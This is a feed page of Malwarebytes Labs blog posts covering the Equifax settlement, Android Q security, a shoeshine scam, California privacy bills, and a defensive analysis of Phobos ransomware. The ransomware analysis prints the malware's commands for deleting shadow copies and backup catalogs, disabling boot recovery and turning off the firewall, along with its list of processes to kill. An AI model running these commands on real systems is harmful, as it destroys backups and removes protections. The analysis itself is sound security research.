Techie Feeds

How to get your Equifax money and stay safe doing it

Malwarebytes - Tue, 07/30/2019 - 15:00

Following the enormous data breach of Equifax in 2017—in which roughly 147 million Americans’ suffered the loss of their Social Security numbers, addresses, credit card and driver’s license information, birthdates, and more—the company has agreed to a settlement with the US Federal Trade Commission, in which it will pay at least $650 million.

Much of that settlement—up to $425 million—is reserved for you, the consumers. Here’s how you can see if you’re eligible for a payment.

First, you can check if your sensitive data was compromised during the 2017 data breach by going to Equifax’s new settlement website:

It’s important to quickly note here that this website, which does not look like Equifax’s regular website, is a reported improvement from the last time Equifax tried to set up its own response, which, in the immediate aftermath of the 2017 breach, was described as “completely broken at best, and little more than a stalling tactic or sham at worst.”

Back to that settlement money: By inputting your last name and the last six digits of your Social Security Number (which is too many numbers, we should say), you can find out if you’re eligible for a claim of, at the very least, either 10 years of free credit monitoring or $125 paid through either a check or a pre-paid card.

You can file a claim at Equifax’s web portal here:

Depending on how the 2017 data breach affected you, you may be eligible for more payments.

For example, if you spent time trying to recover from identity theft or fraud that stemmed from Equifax’s data breach, you can be paid $25 per hour for each hour you spent on that work. That work includes placing and removing credit freezes and purchasing credit monitoring services.

Further, if you actually lost money from identity theft or fraud caused by the breach, you can make a claim to be reimbursed for up to $20,000. Documented evidence must be provided.

Beware the scams

Another corporate data breach settlement with the US government means another moment for heightened cybersecurity vigilance.

Equifax’s extremely broad settlement is, if you’ll pardon our stretched metaphor, akin to a dead whale in the open ocean: Sharks are coming.

As with any major news in America, especially news that affects more than 100 million people, the opportunity for cybercriminal attack is high. For example, after the European Union’s General Data Protection Regulation (GDPR) came into effect, countless company emails flooded Americans’ inboxes. Cybercriminals were not far behind, and they sent their own phishing emails that masqueraded as legitimate notices.

The same could happen with the Equifax settlement.

Remember, there is only one website right now to check if you’re eligible for a claim, and it’s the one we’ve listed above.

With the breach once again in everyone’s minds, it’s also a good time to remember how to protect yourself from identity theft. Revisit our blog from 2017 that covers various safety precautions, including obtaining credit monitoring, refusing to reply to texts and calls from unknown phone numbers, and stepping up your password protocol (don’t repeat passwords, make them complex). And for even more in-depth information on identity theft, take a look at this comprehensive article in our cybersecurity basics hub.

Stay safe, everyone.

The post How to get your Equifax money and stay safe doing it appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: Dark Android Q rises

Malwarebytes - Mon, 07/29/2019 - 17:55

Android Q, the upcoming 10th major release of the Android mobile operating system, was developed by Google with three major themes in mind: innovation, security, and privacy. Today, we are going to focus mostly on security and privacy, although there are still many potential changes and updates on the horizon that can be discussed.


Privacy has been a top priority in developing Android Q, as it’s important today to give users control and transparency over how their information is collected and used by apps and by our phones. There are significant changes made in Android Q across the platform to improve privacy, and we are going to inspect them one-by-one.

Note: Developers will need to review new privacy features and test their apps. Impacts can vary based on each app’s core functionality, targeting, and other factors. 

Picture 1 Device location

Let’s start with location. Apps can still ask the user for permission to access location, but now in Android Q, the user sees a larger screen with more choices on when to allow access to location, as shown in Picture 1. Users will be able to give apps access to location data all the time or only when the app is in focus (in use and in the foreground).

This additional control became possible by Android Q introducing a new location permission ACCESS_BACKGROUND_LOCATION, that allows an app to access location in the background.

A detailed guide is available on how to adapt your app for the new location controls. 

Scoped storage

Outside of location, a new feature called “scoped storage” was introduced to give users more security and reduce app clutter. Android Q will still use the READ_EXTERNAL_STORAGE and WRITE_EXTERNAL_STORAGE permissions, but now apps targeting Android Q by default are given a filtered view into external storage.

Such apps can only see their specific directory and specific types of media, thus need no permission to read or write any file in this folder. It also allows a developer to have their own space on the storage of your device that is private without asking for any specific permissions.

Note: There is a guide that describes how files are included in the filtered view, as well as how to update your app so that it can continue to share, access, and modify files that are saved on an external storage device.

From the security standpoint, this is a beneficial update. It stops malicious apps that depend on you granting access to sensitive data because you did not read what you saw in the dialog and just clicked “yes.”

Background restrictions

Another important change is that developers have created restrictions on launching activities from the background without user interaction. This behavior helps reduce interruptions and keeps the user more in control of what’s shown on her screen.

This new change takes effect on all apps running on Android Q. Even if your app has API level 28 or lower and was originally installed on a device with Android 9, restrictions will work after the device is upgraded to Android Q.

Note: Apps running on Android Q can start activities only when one or more of the following conditions are met.

Data and identifiers

To prevent tracking, starting in Android Q, Google will require app developers to request a special privileged permission (READ_PRIVILEGED_PHONE_STATE) before they can access the device’s non-resettable identifiers, both IMEI and the serial number.

Note: Read the best practices to choose the right identifiers for your specific case, as many don’t need non-resettable device identifiers (for analytics purposes, for example).

Also, Android Q devices will now transmit a randomized MAC address by default. Although Google introduced MAC address randomization in Android 6.0, devices could only broadcast a random MAC address if the smartphone initiated a background Wi-Fi or Bluetooth scan. It’s worth mentioning, however, that security researchers proved they can still track devices with randomized MAC addresses.

Wireless network restrictions

Another new feature in Android Q is that apps cannot enable or disable Wi-Fi. The WifiManager.setWifiEnabled() method always returns false.

As of now, with Android Q users are prompted to enable or disable Wi-Fi via the Settings Panel, an API which allows apps to show settings to users in the context of their app.

What’s more, to protect user privacy, manual configuration of the list of Wi-Fi networks is now restricted to system apps and device policy controllers (DPCs). A given DPC can be either the device owner or the profile owner.


Android Q changed the scope of the READ_FRAME_BUFFER, CAPTURE_VIDEO_OUTPUT and CAPTURE_SECURE_VIDEO_OUTPUT permissions. Now they’re signature-access only, so they will prevent silent access to the device’s screen content.

Picture 2

Apps that need access to the device’s screen content will use the MediaProjection API. If your app targets Android 5.1 (API level 22) or lower, users will see a permissions screen when running your app on Android Q for the first time, as shown in Picture 2. This gives users the opportunity to cancel/change access to permissions that the system previously granted to the app while installing.

In addition, Android Q introduces a new ACTIVITY_RECOGNITION permission for apps that need to detect the user’s step count or classify the user’s physical activity. This is done for the users to see how device sensor data is used in Settings.

Note: If your app relies on data from other built-in sensors on the device, such as the accelerometer and gyroscope, you don’t need to declare this new permission in your app.


Android Pie introduced the BiometricPrompt API to help apps utilize biometrics, including face, fingerprint, and iris. To keep users secure, the API was expanded in Android Q to support additional use-cases, including both implicit and explicit authentication.

If we are talking about explicit authentication, users must perform an action to proceed. That can be a tap to the fingerprint sensor or, if it’s face or iris authentication, then the user must click an additional button to proceed. All high-value payments have to be done via explicit flow, for example.

Implicit flow does not require an additional user action. Most often, sign-in and autofill are used in these cases, as there is no need to perform complex actions on simple, unimportant transactions that can be easily reversed.

One more interesting change made in Android Q is support for TLS 1.3. It is claimed that secure connections can be established as much as 40 percent faster with TLS 1.3 compared to TLS 1.2. From a security perspective, TLS 1.3 is cleaner, less error prone, and more reliable. And from a privacy perspective, TLS 1.3 encrypts more of the handshake to better protect the identities of the participating parties.

Another handy new feature in BiometricPrompt is the ability to check if a device supports biometric authentication prior to invoking BiometricPrompt. This is useful when the app wants to show an “enable biometric sign-in” or similar item in their sign-in page or in-app settings menu. 

The last feature we wanted to point out is Adiantum, a storage encryption that protects your data if your phone falls into someone else’s hands. Adiantum is an innovation in cryptography designed to make storage encryption more efficient for devices without cryptographic acceleration to ensure that all devices can be encrypted. 

In Android Q, Adiantum will be part of the Android platform, and Google intends to update the Android Compatibility Definition Document (CDD) to require that all new Android devices be encrypted using one of the allowed encryption algorithms.

Beta 5 and beyond

Android Q Beta 1 was launched on March 13, and we already have Beta 5 available to download. If you would like to try the Beta version, please proceed to to check if your device is in the supported list and download the beta.

The Android 10 Q release date timeline

There is still one more beta before the final build drops sometime before Q3 is over, according to timeline. Developers should dive into Android Q and start learning about the new features and APIs they can use in their apps before adjusting.

And perhaps the most important question of all—what will Android Q be named? The list of desserts starting with Q is rather small, and some suggestions that already came up among network users are:

What would you call it? And do you think these changes will better protect user privacy and security? Sound off in the comments.

The post Mobile Menace Monday: Dark Android Q rises appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (July 22 – 28)

Malwarebytes - Mon, 07/29/2019 - 15:50

Last week on Malwarebytes Labs, we offered an extensive analysis into the Malaysian Airlines Flight 17 investigation, updated users on the newest feature set to AdwCleaner 7.4.0 (it now detects pre-installed software), and provided a deep dive into Phobos ransomware. We also broke down the latest privacy cautions regarding the popular app, FaceApp.

In addition, we looked at an interesting real-life shoe-shining scam that was noticed online, and gave a comprehensive breakdown between stalkerware and parental monitoring apps.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (July 22 – 28) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Good Twitter Samaritans accidentally prevent shoeshine scam

Malwarebytes - Fri, 07/26/2019 - 16:45

A few days ago, Indian news portals were buzzing with tales of a well-worn shoeshine scam making its way into social media. It’s a great example of how good-natured gestures can unwittingly aid scammers when we combine high-visibility accounts with potential lack of fact checking. Thankfully, it comes with a happy ending for a change.

What happened?

A Twitter user dragged this offline scam into the digital realm by mentioning that they’d run into an individual claiming to be a shoeshine boy. The scam goes as follows: They gently insist on shining your shoes, they refuse any money offered unrelated to said shoe shining (“I’m not begging”), and then they get to work.

While shining the shoes, eventually they mention that their life would change if they could get a shoeshine box. As the discussion continues, they pick the right moment to shift gears, and before you know it, they’re telling you to take them to a specific shop a small journey away, and the confused person with the sparkling shoes is handing over about US$25.

The scam here is that once the victim has gone, the scammer goes back to the shop and gives half the money back. It’s a smart piece of social engineering on the part of the scammer. Aside from anything else, “Please come with me to this random location 15 minutes away” isn’t a safe thing to do at the best of times.

What happened after this hit social media?

Glad you asked. This rather old scam may have played out the same way it always has, except the Twitter user mentioned above caught the attention of some big follower accounts. Hoping to assist the suspect shoeshine boy in their quest to get a shoeshine box, actress Parineeti Chopra went a little further and started mentioning the possibility of job offers. Given her account currently has 13.2 million followers, that’s a massive chunk of syndication for a fakeout.

As we’ve seen many times in the past, this could’ve just as easily been a malware scam, or a phish, or some other awful wheeze at the victim’s expense. When you’re blasting out content to that many people, one hopes it’d be checked beforehand. Alas, it was not. Would the person contacted by the scammer fall for it? Or would things take a different turn?

To the rescue

Weirdly, it took the multi-million follower actress Tweeting out a “help this person” comment for other people to point out that it was a fake [1], [2]. If she hadn’t, the person who first mentioned it might have been parted with their cash.

You can see video of an actual encounter with someone who (it is claimed) is the same individual from the most recent anecdote. Essentially, if you’re in India and you’re approached for a shoeshine: fine. If there’s a sudden mention of shoeshine boxes and immediate trips to another location: politely decline and be on your way.

Summer is here…and so are the scams

This is an interesting case where unintentionally amplifying a scam actually helped to bring it down. You see that happen a fair bit in tech-centric realms, especially with so many scam hunters online and lurking on social media. However, this isn’t quite so common with real-world scams and certainly doesn’t typically play out in real time.

So-called fake news and other forms of misinformation can be incredibly damaging, and it doesn’t have to be at the international level. More commonplace scams targeting regular web users can be just as harmful on an individual level. Given summer is indeed upon us, it’s a good reminder to try and steer clear of scams whether online, offline, or a mixture of both.

The post Good Twitter Samaritans accidentally prevent shoeshine scam appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Changing California’s privacy law: A snapshot at the support and opposition

Malwarebytes - Thu, 07/25/2019 - 15:59

This month, the corporate-backed, legislative battle against California privacy met a blockade, as one Senate committee voted down and negotiated changes to several bills that, as originally written, could have weakened the state’s data privacy law, the California Consumer Privacy Act.

Though the bills’ authors have raked in thousands of dollars in campaign contributions from companies including Facebook, AT&T, and Google, records portray broader donor networks, which include Political Action Committees (PACs) for real estate, engineering, carpentry, construction, electrical, and municipal workers.

Instead, Big Tech relied on advocacy and lobbying groups to help push favorable legislative measures forward. For example, one bill that aimed to lower restrictions if companies provide consumer data to government agencies was supported by TechNet and Internet Association.

Those two groups alone represent the interests of Amazon—which was caught offering a corporate job to a Pentagon official involved in a $10 billion Department of Defense contract that the company is currently seeking—and Microsoft—another competitor in the same $10 billion contract—along with Google, Twitter, Lyft, Uber, PayPal, Accenture, and Airbnb.

Below is a snapshot of five CCPA-focused bills that were all scheduled for a vote during a July 9 hearing by the California Senate Judiciary Committee. The committee chair, Senator Hannah-Beth Jackson, pulled a 12-hour-plus shift that day, trying to clear through more than 40 bills.

Yet another day in politics.

We hope to provide readers with a look at both the support and opposition to these bills, along with a view of who wrote the bills and what groups have donated to their authors. It is important to remember that lawmaking is rarely a straight line, and a campaign contribution is far from an endorsement.

The assembly bills AB 1416
  • What’s it all about? Exceptions to the CCPA when companies provide consumer data to government agencies
  • Author: Assemblymember Ken Cooley
  • Author’s top 2018 donors: the California Democratic Party ($111,192), the State Building and Construction Trades Council of California PAC Small Contributor Committee ($17,600), the California State Council of Laborers PAC ($17,600).
  • Author’s tech donors: AT&T ($8,800), Facebook ($6,900)
  • Supported by: Internet Association, Technet, Tesla, Symantec, California Land Title Association, California Alliance of Caregivers, among others
  • Opposed by: ACLU of California, Electronic Frontier Foundation, Common Sense Kids Action, and Privacy Rights Clearinghouse

AB 1416 would have created a new exception to the CCPA for any business that “provides a consumer’s personal information to a government agency solely for the purposes of carrying out a government program, if specified requirements are met.”

The bill would have granted companies the option to neglect a consumer’s decision to opt-out of having their data sold to another party, so long as the sale of that consumer’s data was “for the sole purpose of detecting security incidents, protecting against malicious, deceptive, fraudulent, or illegal activity, and prosecuting those responsible for that activity.”

According to multiple privacy groups, those exceptions were too broad. In a letter signed by ACLU of California, EFF, Common Sense Kids Action, and Privacy Rights Clearinghouse, the groups wrote:

“Given the breath of these categories, especially with the increasing use of machine learning and other data-driven algorithms, there is no practical limit on the kinds of data that might be sold for these purposes. It would even allow sales based on the purchaser’s asserted purpose, increasing the potential for abuse, much like the disclosure of millions of Facebook user records by Cambridge Analytica.”

These challenges were never tested with a vote, though, as Asm. Cooley pulled the bill before the committee hearing ended.

AB 873
  • What’s it all about? Changing CCPA’s definition of “deidentified” information
  • Author: Assemblymember Jacqui Irwin
  • Author’s top 2018 donors: California Democratic Party ($105,143), the State Building and Construction Trades Council of California PAC ($17,600), the Professional Engineers in California Government PECG-PAC ($17,600)
  • Author’s tech donors: Facebook ($8,800), AT&T ($8,200), Hewlett Packard ($3,700)
  • Supported by: California Chamber of Commerce (sponsor), Internet Association, Technet, Advanced Medical Technology Association, California News Publishers Association, among others
  • Opposed by: ACLU of California, EFF, Campaign for a Commercial-Free Childhood, Access Humboldt, Oakland Privacy, Consumer Reports, among others

AB 873 would have narrowed the scope for what CCPA protects—“personal information”—by broadening the definition of something that CCPA currently does not protect—“deidentified” information.

According to the bill, the definition of “deidentified” information would now include “information that does not identify, and is not reasonably linkable, directly or indirectly, to a particular consumer.”

Privacy advocates claimed the bill had too broad a reach. In a letter, several opponents wrote that AB 873 “would allow businesses to track, profile, recognize, target, and manipulate consumers as they encountered them in both online and offline settings while entirely exempting those practices from the scope of the CCPA, as long as the information used to do so was not tied to a person’s ‘real name,’ ‘SSN’ or similar traditional identifiers.”

During the Senate committee hearing, Asm. Irwin defended her bill by saying that CCPA’s current definition of deidentified information was “unworkable.” She then rebuffed suggestions by the committee chair to add amendments to her bill.

The bill failed to pass on the committee’s 3–3 vote.

AB 25
  • What’s it all about? Exceptions to CCPA for employers that collect data from their employees and job applicants
  • Author: Assemblymember Ed Chau
  • Author’s top 2018 donors: California State Council of Service Employees ($17,600), the California State Council of Laborers ($13,200) the California State Pipe Trades Council ($10,000).
  • Author’s tech donors: Facebook ($4,400), AT&T ($3,900), Hewlett Packard ($3,200), Google ($2,500), Intuit ($2,000)
  • Supported by: Internet Association, Technet, California Chamber of Commerce, National Payroll Reporting Consortium, among others
  • Opposed, unless amended, by: ACLU of California, EFF, Center for Digital Democracy, Oakland privacy, among others

AB 25, as originally written, would have removed CCPA protections for some types of data that employers collect both on their employees and their job applicants.

Hayley Tsukayama, legislative analyst for EFF, said that a concern she and other privacy advocates had with the bill was that employers are beginning to collect more information on their employees that more often resemble consumer-type data.

“We are seeing a lot more of these workplace surveillance programs pop up,” Tsukayama said over the phone, giving a hypothetical example of a fitness tracker for employees where the data could be shared with health insurance companies. “The ways that this collection is being introduced into the workplace, it’s not necessary for the employer-employee relationship, and it is more in the vain of consumer data.”

After Chau agreed to add amendments to his bill, the Senate committee passed it. The bill, if it becomes law, will sunset in one year, giving legislators and labor groups another opportunity to review its impact in a short time.

AB 846
  • What’s it all about? Customer loyalty programs
  • Author: Assemblymember Autumn Burke
  • Author’s top 2018 donors: State Building and Construction Trades Council of California PAC ($17,600), SEIU California State Council Small Contributor Committee ($17,600), IBEW Local 18 Water & Power Defense League ($17,600), California State Council of Laborers PAC ($17,600)
  • Author’s tech donors: Facebook ($8,800), Technet California Political Action Committee ($8,449), Charter Communications ($7,900), AT&T and its affiliates ($7,300)
  • Supported by: California Chamber of Commerce, California Grocers Association, California Hotel & Lodging Association, California Restaurant Association, Ralphs Grocery Company, Wine Institute, among others
  • Opposed, unless amended, by: ACLU of California, EFF, Common Sense Kids Action, Privacy Rights Clearinghouse, Access Humboldt

AB 846 targets CCPA’s current non-discrimination clause that prohibits companies from offering incentives—like lowered prices—to customers based on their data practices.

The bill would clarify that CCPA’s regulations are not violated when businesses offer “a different price, rate, level, or quality of goods or services to a consumer if the offering is in connection with a consumer’s voluntary participation in a loyalty, rewards, premium features, discount, or club card program.”

The bill received so many changes though, that some groups were puzzled over what it allows.

“There was a point at which [AB 846] said any service that has a functionality directly related to the collection of, and use, of personal information was exempt,” Tsukayama said. “We spent a lot of time going ‘Well, what does that mean?’ We never got a satisfactory answer.”

She continued: “We were concerned that this would cover a lot of ad tech, or invasive company programs, to collect more data.”

With additional amendments to be added, the Senate committee passed the bill.

AB 1564
  • What’s it all about? Whether businesses have to provide a phone number for consumer data requests
  • Author: Assemblymember Marc Berman
  • Author’s top 2018 donors: California State Council of Service Employees ($26,100), Northern California Carpenters Regional Council SCC ($17,600), American Federation of State, County & Municipal Employees – CA People SCC ($17,600)
  • Author’s tech donors: Facebook ($8,800), TechNet PAC ($6,526)
  • Supported by: Internet Association (sponsor), Engine, Coalition of Small & Disabled Veteran Businesses, Small Business California, National Federation of Independent Businesses (CA), among others
  • Opposed by: ACLU of California, EFF, Center for Digital Democracy, Oakland Privacy, Access Humboldt, Privacy Rights Clearinghouse, among others  

CCPA allows Californians to contact the companies that collect their data and make requests about that data, including accessing it, changing it, and deleting it. The law states that companies must provide at least two methods of contact, including one toll-free telephone number, for those requests.

AB 1564 would allow online-only businesses to provide their direct consumers with just one method of contact—an email address—for data requests.

Privacy advocates previously warned that the bill could make it harder for those with limited Internet access to assert their privacy rights.

The bill, which will be amended, passed the Senate committee.

What comes next?

The California Senate is currently in a summer recess, scheduled to return August 12. The bills that passed the Senate Judiciary Committee—ABs 25, 846, and 1564, regarding employee data, loyalty programs, and email address contacts—will next be heard by the Senate Appropriations Committee, a separate committee of lawmakers who oversee and move forward bills that have a fiscal component.

That committee has until August 30 to move bills to the floor.

Afterwards, either chamber of the state has until September 13 to send a bill to Governor Gavin Newsom’s desk for signature.

The post Changing California’s privacy law: A snapshot at the support and opposition appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A deep dive into Phobos ransomware

Malwarebytes - Wed, 07/24/2019 - 18:09

Phobos ransomware appeared at the beginning of 2019. It has been noted that this new strain of ransomware is strongly based on the previously known family: Dharma (a.k.a. CrySis), and probably distributed by the same group as Dharma.

While attribution is by no means conclusive, you can read more about potential links between Phobos and Dharma here, to include an intriguing connection with the XDedic marketplace.

Phobos is one of the ransomware that are distributed via hacked Remote Desktop (RDP) connections. This isn’t surprising, as hacked RDP servers are a cheap commodity on the underground market, and can make for an attractive and cost efficient dissemination vector for threat groups.

In this post we will take a look at the implementation of the mechanisms used in Phobos ransomware, as well as at its internal similarity to Dharma.

Analyzed sample


Behavioral analysis

This ransomware does not deploy any techniques of UAC bypass. When we try to run it manually, the UAC confirmation pops up:

If we accept it, the main process deploys another copy of itself, with elevated privileges. It also executes some commands via windows shell.

Ransom notes of two types are being dropped: .txt as well as .hta. After the encryption process is finished, the ransom note in the .hta form is popped up:

Ransom note in the .hta version Ransom note in the .txt version

Even after the initial ransom note is popped up, the malware still runs in the background, and keeps encrypting newly created files.

All local disks, as well as network shares are attacked.

It also uses several persistence mechanisms: installs itself in %APPDATA% and in a Startup folder, adding the registry keys to autostart its process when the system is restarted.

A view from Sysinternals’ Autoruns

Those mechanisms make Phobos ransomware very aggressive: the infection didn’t end on a single run, but can be repeated multiple times. To prevent repeated infection, we should remove all the persistence mechanisms as soon as we noticed that we got attacked by Phobos.

The Encryption Process

The ransomware is able to encrypt files without an internet connection (at this point we can guess that it comes with some hardcoded public key). Each file is encrypted with an individual key or an initialization vector: the same plaintext generates a different ciphertext.

It encrypts a variety of files, including executables. The encrypted files have an e-mail of the attacker added. The particular variant of Phobos also adds an extension ‘.acute’ – however in different variants different extensions have been encountered. The general pattern is: <original name>.id[<victim ID>-<version ID>][<attacker's e-mail>].<added extention>

Visualization of the encrypted content does not display any recognizable patterns. It suggests that either a stream cipher, or a cipher with chained blocks was used (possibly AES in CBC mode). Example – a simple BMP before and after encryption:

When we look inside the encrypted file, we can see a particular block at the end. It is separated from the encrypted content by ‘0’ bytes padding. The first 16 bytes of this block are unique per each file (possible Initialization Vector). Then comes the block of 128 bytes that is the same in each file from the same infection. That possibly means that this block contains the encrypted key, that is uniquely generated each run. At the end we can find a 6-character long keyword which is typical for this ransomware. In this case it is ‘LOCK96’, however, different versions of Phobos have been observed with different keywords, i.e. ‘DAT260’.

In order to fully understand the encryption process, we will look inside the code.


In contrast to most of the malware that comes protected by some crypter, Phobos is not packed or obfuscated. Although the lack of packing is not common in general population of malware, it is common among malware that are distributed manually by the attackers.

The execution starts in WinMain function:

During its execution, Phobos starts several threads, responsible for its different actions, such as: killing blacklisted processes, deploying commands from commandline, encrypting accessible drives and network shares.

Used obfuscation

The code of the ransomware is not packed or obfuscated. However, some constants, including strings, are protected by AES and decrypted on demand. A particular string can be requested by its index, for example:

The AES key used for this purpose is hardcoded (in obfuscated form), and imported each time when a chunk of data needs to be decrypted.

Decrypted content of the AES key

The Initialization Vector is set to 16 NULL bytes.
The code responsible for loading the AES key is given below. The function wraps the key into a BLOBHEADER structure, which is then imported.

From the BLOBHEADER structure we can read the following information: 0x8 – PLAINTEXTKEYBLOB, 0x2=CUR_BLOB_VERSION, 0x6610 – CALG_AES_256.

Example of a decrypted string:

Among the decrypted strings we can also see the list of the attacked extensions

We can also find a list of some keywords:

acute actin Acton actor Acuff Acuna acute adage Adair Adame banhu banjo Banks Banta Barak Caleb Cales Caley calix Calle Calum Calvo deuce Dever devil Devoe Devon Devos dewar eight eject eking Elbie elbow elder phobos help blend bqux com mamba KARLOS DDoS phoenix PLUT karma bbc CAPITAL

These are a list of possible extensions used by this ransomware. They are (probably) used to recognize and skip the files which already has been encrypted by a ransomware from this family. The extension that will be used in the current encryption round is hardcoded.

One of the encrypted strings specifies the formula for the file extension, that is later filled with the Victim ID:

UNICODE ".id[<unique ID>-1096].[].acute"

Killing processes

The ransomware comes with a list of processes that it kills before the encryption is deployed. Just like other strings, the full list is decrypted on demand:

msftesql.exe sqlagent.exe sqlbrowser.exe sqlservr.exe sqlwriter.exe
oracle.exe ocssd.exe dbsnmp.exe synctime.exe agntsvc.exe
mydesktopqos.exe isqlplussvc.exe xfssvccon.exe mydesktopservice.exe
ocautoupds.exe agntsvc.exe agntsvc.exe agntsvc.exe encsvc.exe
firefoxconfig.exe tbirdconfig.exe ocomm.exe mysqld.exe mysqld-nt.exe
mysqld-opt.exe dbeng50.exe sqbcoreservice.exe excel.exe infopath.exe
msaccess.exe mspub.exe onenote.exe outlook.exe powerpnt.exe steam.exe
thebat.exe thebat64.exe thunderbird.exe visio.exe winword.exe

Those processes are killed so that they will not block access to the files that are going to be encrypted.

a fragment of the function enumerating and killing processes Deployed commands

The ransomware deploys several commands from the commandline. Those commands are supposed to prevent from recovering encrypted files from any backups.

Deleting the shadow copies:

vssadmin delete shadows /all /quiet
wmic shadowcopy delete

Changing Bcdedit options (preventing booting the system in a recovery mode):

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no

Deletes the backup catalog on the local computer:

wbadmin delete catalog -quiet

It also disables firewall:

netsh advfirewall set currentprofile state off
netsh firewall set opmode mode=disable
exit Attacked targets

Before the Phobos starts its malicious actions, it checks system locale (using GetLocaleInfoW options: LOCALE_SYSTEM_DEFAULT, LOCALE_FONTSIGNATURE ). It terminates execution in case if the 9th bit of the output is cleared. The 9th bit represent Cyrlic alphabets – so, the systems that have set it as default are not affected.

Both local drives and network shares are encrypted.

Before the encryption starts, Phobos lists all the files, and compare their names against the hardcoded lists. The lists are stored inside the binary in AES encrypted form, strings are separated by the delimiter ‘;’.

Fragment of the function decrypting and parsing the hardcoded lists

Among those lists, we can find i.e. blacklist (those files will be skipped). Those files are related to operating system, plus the info.txt, info.hta files are the names of the Phobos ransom notes:


There is also a list of directories to be skipped – in the analyzed case it contains only one directory: C:\Windows.

Among the skipped files are also the extensions that are used by Phobos variants, that were mentioned before.

There is also a pretty long whitelist of extensions:

1cd 3ds 3fr 3g2 3gp 7z accda accdb accdc accde accdt accdw adb adp ai ai3 ai4 ai5 ai6 ai7 ai8 anim arw as asa asc ascx asm asmx asp aspx asr asx avi avs backup bak bay bd bin bmp bz2 c cdr cer cf cfc cfm cfml cfu chm cin class clx config cpp cr2 crt crw cs css csv cub dae dat db dbf dbx dc3 dcm dcr der dib dic dif divx djvu dng doc docm docx dot dotm dotx dpx dqy dsn dt dtd dwg dwt dx dxf edml efd elf emf emz epf eps epsf epsp erf exr f4v fido flm flv frm fxg geo gif grs gz h hdr hpp hta htc htm html icb ics iff inc indd ini iqy j2c j2k java jp2 jpc jpe jpeg jpf jpg jpx js jsf json jsp kdc kmz kwm lasso lbi lgf lgp log m1v m4a m4v max md mda mdb mde mdf mdw mef mft mfw mht mhtml mka mkidx mkv mos mov mp3 mp4 mpeg mpg mpv mrw msg mxl myd myi nef nrw obj odb odc odm odp ods oft one onepkg onetoc2 opt oqy orf p12 p7b p7c pam pbm pct pcx pdd pdf pdp pef pem pff pfm pfx pgm php php3 php4 php5 phtml pict pl pls pm png pnm pot potm potx ppa ppam ppm pps ppsm ppt pptm pptx prn ps psb psd pst ptx pub pwm pxr py qt r3d raf rar raw rdf rgbe rle rqy rss rtf rw2 rwl safe sct sdpx shtm shtml slk sln sql sr2 srf srw ssi st stm svg svgz swf tab tar tbb tbi tbk tdi tga thmx tif tiff tld torrent tpl txt u3d udl uxdc vb vbs vcs vda vdr vdw vdx vrp vsd vss vst vsw vsx vtm vtml vtx wb2 wav wbm wbmp wim wmf wml wmv wpd wps x3f xl xla xlam xlk xlm xls xlsb xlsm xlsx xlt xltm xltx xlw xml xps xsd xsf xsl xslt xsn xtp xtp2 xyze xz zip

How does the encryption work

Phobos uses the WindowsCrypto API for encryption of files. There are several parallel threads to deploy encryption on each accessible disk or a network share.

Deploying the encrypting thread

AES key is created prior to the encrypting thread being run, and it is passed in the thread parameter.

Fragment of the key generation function:

Calling the function generating the AES key (32 bytes)

Although the AES key is common to all the files that are encrypted in a single round, yet, each file is encrypted with a different initialization vector. The initialization vector is 16 bytes long, generated just before the file is open, and then passed to the encrypting function:

Calling the function generating the AES IV (16 bytes)

Underneath, the AES key and the Initialization Vector both are generated with the help of the same function, that is a wrapper of CryptGenRandom (a strong random generator):

The AES IV is later appended to the content of the encryped file in a cleartext form. We can see it on the following example:

Before the file encryption function is executed, the random IV is being generated:

The AES key, that was passed to the thread is being imported to the context (CryptImportKey), as well the IV is being set. We can see that the read file content is encrypted:

After the content of the file is encrypted, it is being saved into the newly created file, with the ransomware extension.

The ransomware creates a block with metadata, including checksums, and the original file name. After this block, the random IV is being stored, and finally, the block containing the encrypted AES key. The last element is the file marker: “LOCK96”:

Before being written to the file, the metadata block is being encrypted using the same AES key and IV as the file content.

setting the AES key before encrypting the metadata block

Encrypted metadata block:

Finally, the content is appended to the end of the newly created file:

Being a ransomware researcher, the common question that we want to answer is whether or not the ransomware is decryptable – meaning, if it contains the weakness allowing to recover the files without paying the ransom. The first thing to look at is how the encryption of the files is implemented. Unfortunately, as we can see from the above analysis, the used encryption algorithm is secure. It is AES, with a random key and initialization vector, both created by a secure random generator. The used implementation is also valid: the authors decided to use the Windows Crypto API.

Encrypting big files

Phobos uses a different algorithm to encrypt big files (above 0x180000 bytes long). The algorithm explained above was used for encrypting files of typical size (in such case the full file was encrypted, from the beginning to the end). In case of big files, the main algorithm is similar, however only some parts of the content are selected for encryption.

We can see it on the following example. The file ‘test.bin’ was filled with 0xAA bytes. Its original size was 0x77F87FF:

After being encrypted with Phobos, we see the following changes:

Some fragments of the file has been left unencrypted. Between of them, starting from the beginning, some fragments are wiped. Some random-looking block of bytes has been appended to the end of the file, after the original size. We can guess that this is the encrypted content of the wiped fragments. At the very end of the file, we can see a block of data typical for Phobos::

Looking inside we can see the reason of such an alignment. Only 3 chunks from the large file are being read into a buffer. Each chunk is 0x40000 bytes long:

All read chunks are merged together into one buffer. After this content, usual metadata (checksums, original file name) are added, and the full buffer is encrypted:

By this way, authors of Phobos tried to minimize the time taken for encryption of large files, and at the same time maximize the damage done.

How is the AES key protected

The next element that we need to check in order to analyze decryptability is the way in which the authors decided to store the generated key.

In case of Phobos, the AES key is encrypted just after being created. Its encrypted form is later appended at the end of the attacked file (in the aforementioned block of 128 bytes). Let’s take a closer look at the function responsible for encrypting the AES key.

The function generating and protecting the AES key is deployed before the each encrypting thread is started. Looking inside, we can see that first several variables are decrypted, in the same way as the aforementioned strings.

Decryption of the constants

One of the decrypted elements is the following buffer:

It turns out that the decrypted block of 128 bytes is a public RSA key of the attacker. This buffer is then verified with the help of a checksum. A checksum of the RSA key is compared with the hardcoded one. In case if both matches, the size that will be used for AES key generation is set to 32. Otherwise, it is set to 4.

Then, a buffer of random bytes is generated for the AES key.

After being generated, the AES key is protected with the help of the hardcoded public key. This time the authors decided to not use Windows Crypto API, but an external library. Detailed analysis helped us to identify that it is the specific implementation of RSA algorithm (special thanks to Mark Lechtik for the help).

